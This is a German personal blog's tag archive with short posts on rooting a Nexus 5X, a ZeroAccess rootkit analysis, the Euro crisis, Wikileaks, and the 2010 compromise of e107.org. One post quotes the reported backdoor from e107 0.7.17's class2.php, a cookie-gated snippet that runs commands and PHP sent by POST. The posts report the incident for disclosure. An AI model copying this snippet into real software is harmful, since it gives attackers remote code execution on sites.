Archiv

Artikel Tagged ‘system’

Nexus 5x, root und OTA Systemupdates

31. März 2016 4 Kommentare

nexusNach einer kurzen Exkursion Richtung Samsung Galaxy S6, bin ich wie ein geschlagener Hund wieder zurueck zu meinem Nexus. Das SGS6 ist hardwaretechnisch grandios, super verarbeitet, schick und edel, dem weicht nun ein schlichtes Nexus, dessen Design ja bekannt ist, spaetestens jetzt :).
Plastik dem edlen Material und warum das? Weil die Software auf dem SGS6 ein Grauen ist.
Es gibt noch immer keine Vanilla Roms fuer das SGS, wird es wohl auch kaum noch geben nehme ich an, also muesste man mit TouchWiz leben und das kann ich einfach nicht.
Viel zu gruselig schon das Kontaktbuch, viele komische kaputte Verknuepfungen die sich nicht aufloesen lassen, um nur ein Beispiel zu nennen.

So nun genug geredet, natuerlich war der erste Weg: Root und wir kennen es ja, sobald man root auf seinem Geraet hat, ist das mit OTA Updates so eine Sache. Mehr…

Autopsie eines Rootkits

16. November 2010 Keine Kommentare

Giuseppe „Evilcry“ Bonfa von InfoSec hat das Crime Root Kit ZeroAccess seiner Auskunft nach komplett zerlegt und alle Antidebugging und Antiforensic Features des selbigen ausgehebelt und zeigt in einem 4-Teiligen Tutorial die Schritte welche unternommen wurden um an alle Details des Rootkits zu kommen.
Das InfoSec Institute beschreibt ZeroAccess als ein weit fortgeschrittenes Rootkit welches es selbst versierten Anwendern unmoeglich macht dieses vom System wieder zu entfernen und wohl auch Sicherheitsexperten und Forensiker haben hier massive Steine in den Weg gelegt bekommen. Mehr…

Euro Krise Griechenland: Frankreich droht mit Euro aus *update*

14. Mai 2010 4 Kommentare

Im Streit um das Rettungspaket für Griechenland hat Frankreichs
Praesident Nicolas Sarkozy Bundeskanzlerin Angela Merkel offenbar massiv
unter Druck gesetzt und damit gedroht sich aus dem Euro zurueckzuziehen so berichtet die spanische „El Pais“, also ich finde die Idee sehr gut, jedoch sollte statt Frankreich hier Deutschland stehen.
In Deutschland ist ohnehin kein Geld mehr uebrig wenn man sich unser Gesundheitssystem, die Strassen, die Kinderbetreuung etc ansieht, nun noch ein Milliardenrettungspaket und natuerlich soll Deutschland hier auch noch fuer Laender einstehen die keine Mittel haben.
Ja dann gibt es ein Euro aus und ich denke ich spreche hier fuer einen Grossteil der Bevoelkerung wenn ich sage: Ja genau das ist es was Deutschland moechte.

Die Bundesregierung dementiert aktuell den Vorfall, zu lesen unter: Spiegel Online

e107.org cracked, backdoored und nun gefixed?

27. Januar 2010 Keine Kommentare

Mit einer zeitlich zurueckdatierten News meldet sich McFly vom e107 Developer Team und raeumt ein, dass e107.org gecracked wurde und auch das die Version 0.7.17 von einer Backdoor betroffen war, auch wenn der eigentliche Source nie kompromittiert worden ist, wurde hier fuer kurze Zeit eine Version zum Download angeboten welche die Backdoor enthalten hatte.
McFly raeumt auch ein, dass sie sich wohl zu lange Zeit genommen hatten, die Luecke zu patchen, das laesst auf weiteres schliessen, wie Beispielsweise laengere Kenntnis von der Sicherheitsluecke.
Einzelheiten zum Crack oder auch welche Seiten von e107 wie veraendert wurden verschweigt der Entwickler, nicht gerade das was man erwarten oder vielmehr hoffen wuerde, hier muessen Mailinglisten, Blogs und Co fuer Aufklaerung sorgen – wirklich schade.
Der Entwickler hofft nun alle schaedlichen Files entfernt zu haben und alle Spuren des Einbruchs entfernt zu haben.

Wer sich nun fragt wieso ich mich gerade an der Geschichte 3 Posts lang aufhaenge, ist es doch nur ein Beispiel von vielen!? Ja soweit richtig, jedoch war mir einfach danach.

e107.org Backdoor: The story continues

26. Januar 2010 Keine Kommentare

Nachdem hier bereits gestern von einer etwaigen Backdoor in e107 in der Version 0.7.17 berichtet wurde, geht die Geschichte nun weiter.
Scheinbar wurde diese stillschweigend aus den Sourcen entfernt und eine neue Version hochgeladen welche die Backdoor nicht enthaelt und neue Versionen der class2.php aufweist, scheinbar wurde hier in 3 Schritten gepatched, denn die aktuelle Version 0.7.17 unterscheidet sich von der die ich gestern testen konnte, jedoch war die Version die ich in den Haenden halten konnte, nicht die Version, welche das FD Posting enthalten hat.
Nun geht es weiter auf: http://e107.org/news.php finden sich ueber dem Documenttype Javascripts die dort wohl nicht sein sollten in der Form: <a href=’/wiki/docs/html/.store/[Spamtext]-[Number].php‘>spamtext</a>

Andere User berichten von ihren Virenscannern mit Meldungen wie „Virus/Spyware Mal/ObfJS-CB!“
Auch sind weitere Seiten nicht nur die News Seite betroffen.

Von den e107 Entwicklern bisher noch kein Statemen, die Webseite ist nach wie vor online, statt diese offline zu nehmen und etwaige Einbruchsspuren zu entfernen, wird hier im Hintergrund nur leise gefixed?

Update: Ich habe gerade ein Gespraech mit einem e107.org Developer gehabt, hier heisst es: Ja die Luecke ist bekannt, wir haben sie gefixed, was erwartest Du mehr? MS machts nicht besser. Das es sich hierbei um einen Silentpatch handelt interessiert wohl kaum, schliesslich machen andere auch Scheisse, wieso nicht auch im eigenen Laden.
Das nenn ich mal eine Aussage!

e107 Version 0.7.17 Backdoored?

25. Januar 2010 Keine Kommentare

Laut der ML FullDisclosure hat sich angeblich im CM-System e107 in der aktuellen Version 0.7.17 eine Backdoor eingeschlichen oder/bzw der Server wurde kompromittiert und die Sourcen wurden veraendert.

Das Team rund um e107 wurde informiert jedoch liegen noch keine offiziellen Angaben hierzu vor.
Die Backdoor befindet sich angeblich in: class2.php Line: 1876
hier soll folgender Code zu finden sein:
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

Zu finden waere bei mir die md5 Zeile jedoch in Zeile 1874, den Rest kann ich nicht finden, warten wirs ab.

KategorienOpensource, Security Tags: , , , ,

Ankuendigung Wikileaks – 10.000 Seiten „german toll collect“

25. November 2009 Keine Kommentare

Wikileaks hat angekuendigt das sie 10.000 Seiten des bekannten Mautsystems „Toll Collect“ releasen wollen, das ganze wahrscheinlich schon morgen. Wieder ein Schlag gegen die Datensammler unserer Nationen, ich bin gespannt was dort alles zu finden sein wird.
Die ersten Publikationen sind ja schon veroeffentlicht worden.

(Quelle: @wikileaks twitter Nachricht)